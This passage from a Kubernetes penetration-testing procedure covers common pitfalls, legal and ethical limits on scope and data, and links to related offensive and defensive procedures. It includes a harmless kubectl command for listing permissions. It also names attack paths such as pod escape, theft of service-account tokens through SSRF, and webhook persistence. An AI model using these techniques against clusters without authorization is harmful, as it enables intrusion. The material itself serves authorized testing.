  • ❌ Forgetting that managed-k8s control-plane audit logs are opt-in on EKS / AKS (and Data Access on GKE) — your detection-coverage finding may be that the customer didn't enable audit at all
  • ❌ Leaving testing artifacts — debug pods, ephemeral containers, kubectl debug copies, RoleBindings, CronJobs, mutating webhooks — running after engagement close
  • ❌ Using kubectl exec --insecure-skip-tls-verify in a hurry; the TLS chain is part of the evidence trail
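
For the verb-resource pitfall above, a minimal enumeration sketch; the SA name and namespace are placeholders:

```bash
# Pin the finding to exact verb-resource pairs rather than "over-permissive":
kubectl auth can-i --list -n app \
  --as system:serviceaccount:app:default
kubectl auth can-i create rolebindings -n app \
  --as system:serviceaccount:app:default
kubectl auth can-i create pods --subresource=exec -n app \
  --as system:serviceaccount:app:default
```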

19. Legal & Ethics

Kubernetes pentesting touches three trust boundaries — the cluster API plane, the workload-identity bridge to the cloud-provider tenant, and the multi-tenant node host — and the legal exposure compounds across them. The canonical legal framework is in Legal & Ethics; this section names only the k8s-specific exposures.

  • CSP managed-k8s pentesting policy is binding. AWS, Azure, and GCP each maintain a managed-k8s pentesting policy separate from their generic cloud-pentesting policy [verify 2026-04-27]. Some primitives (control-plane DDoS, high-rate scanning of the kube-apiserver, exploiting CSP-managed control-plane CVEs) are prohibited regardless of customer authorization. Re-read the policy at the start of each engagement.
  • Scope is per-cluster, per-namespace, per-action-class. A signed RoE that authorizes "the Kubernetes environment" without naming clusters, namespaces, and the action classes (read-only / RBAC-mutate / pod-escape / WI-exercise) is too vague.
  • Workload-identity exercise crosses tenant boundaries. Exercising an in-scope SA's binding to IRSA / GKE Workload Identity / AKS Pod Identity mints a cloud-provider token and reaches the cloud-provider tenant as the bound IAM principal. That tenant's authorization is required separately. See Cloud Pentesting for the cloud-side authorization framework.
  • Multi-tenant cluster scope. In SaaS clusters and namespace-as-a-service deployments, every tenant on the cluster is a separate authorization subject. Tenant-A's pentest does not authorize you to enumerate or describe Tenant-B's namespaces.
  • Customer data is regulated. Reading Secrets, ConfigMaps with sensitive data, persistent-volume contents, or pod-resident application state can trigger GDPR Art. 6/9, HIPAA, PCI DSS, or sector-specific obligations. Default to type-only enumeration; any read of Secret data, application data, or PV contents needs named authorization.
  • Persistent admission-controller mutations are uniquely sensitive. Mutating webhooks, ValidatingAdmissionPolicies, aggregated apiservers, and CRD-bound controllers can persist long after the engagement. Get each in writing; rotate / revert at engagement close; document the rotation in the report.
  • Image registry actions are out-of-scope by default. Even with cluster-admin, pushing / overwriting / deleting images in a registry reaches the registry's tenant — separate authorization required from the registry owner.
  • CSAM / sensitive-crime content. If pod logs, persistent volumes, or in-cluster object storage surface CSAM, trafficking, or threat-to-life indicators, hard-stop and route per Sensitive Crime Intake & Escalation — URL + timestamp only, no content preservation.
  • Cost can be the finding. A pod-escape PoC that crashes a node DaemonSet, a kubectl get pods --watch left running, a kubectl debug that copies a 200GB pod — these are real engagement-cost outcomes. Set a cost ceiling in the RoE; monitor billing alerts.

OPSEC framing (operator handle, sacrificial-account pool, IOC defang in the report) lives in OPSEC.


Engagement governance:

Pentesting & Security (offensive — siblings and parents):

  • Cloud Pentesting — Managed-k8s control-plane / management-API review (EKS / AKS / GKE) lives there; this SOP picks up at the cluster API plane. Workload-identity exercise crosses back to the cloud-pentest authorization framework.
  • Linux Pentesting — Host-level LPE on a worker node after a pod escape lands a process there. This SOP stops at the namespace boundary; that SOP owns kernel-CVE detonation and node-host persistence.
  • Active Directory Pentesting — Hybrid clusters with Entra ID + AKS Workload Identity; AD-Authentication-bridged identity surfaces.
  • Web Application Security — SSRF-to-metadata-server-to-SA-token chain; ingress-controller authorizer bypass; admin-endpoint exposure on in-cluster web apps.
  • Vulnerability Research — 0-day discovery in CRI runtimes, admission-controller webhooks, custom Operators.
  • Bug Bounty Methodology — Cloud-bounty programs (AWS VRP, MSRC Cloud, GCP VRP) cover managed-k8s control planes; bounty-side scope.
  • Detection Evasion Testing — SIEM-validation playbooks; Falco / Tetragon / GuardDuty EKS Audit Log / Defender for Containers / GKE Security Posture coverage validation.

Analysis (defensive counterparts):

  • Cloud Forensics — Defensive counterpart; §10 owns the apiserver-audit-log-driven IR reconstruction. This SOP's offensive findings answer the threat model that cloud-forensics methodology investigates.
  • Malware Analysis — Cluster-resident payloads (cryptominers in pods, supply-chain-compromised images, malicious Helm charts, OCI artifact tampering).
  • Cryptography Analysis — TLS / kubeconfig-cert / image-signing primitive review (cosign keys, Notation roots, JWT signing chains).
  • Forensics Investigation — Post-engagement IR support; node-host-resident artifacts (pod-resident binary on a worker node) routed for deep parsing.

Version: 1.0 · Last Updated: 2026-04-27 · Review Frequency: Quarterly (fast-rotating k8s minor-version landscape, admission-controller projects, runtime CVEs, and managed-k8s feature drift across EKS / AKS / GKE)